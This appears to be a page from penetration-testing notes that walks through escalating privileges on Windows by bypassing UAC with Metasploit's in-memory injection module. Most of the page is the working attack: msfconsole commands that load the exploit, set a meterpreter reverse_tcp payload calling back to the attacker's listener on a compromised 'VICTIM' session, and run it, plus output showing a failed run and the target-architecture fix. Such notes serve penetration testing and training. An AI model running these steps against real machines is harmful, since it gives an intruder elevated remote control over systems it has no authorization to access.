UAC Bypass:Memory Injection

  • Metasploit Windows Escalate UAC Protection Bypass (In Memory Injection) module

    • This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of three separate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

sessions
	2 meterpreter x64/windows VICTIM\admin @ VICTIM 10.10.24.6:4444 -> 10.2.18.116:49219 (10.2.18.116)

Here we have a x64 build system

#Exploitation

search bypassuac
use exploit/windows/local/bypassuac_injection
set payload windows/x64/meterpreter/reverse_tcp
set SESSION 2
set LPORT 5533
run
[*] Started reverse TCP handler on 10.10.24.6:5533 
[+] Windows 2012 R2 (6.3 Build 9600). may be vulnerable.
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[-] Exploit aborted due to failure: bad-config: x86 Target Selected for x64 System
[*] Exploit completed, but no session was created.

Here we have issue because of bad config and we have not set the target build system correctly

  • Select the correct target - x64

set TARGET Windows\ x64
run
PreviousUAC Bypass Akagai64.exeNextPrivescCheck script

Last updated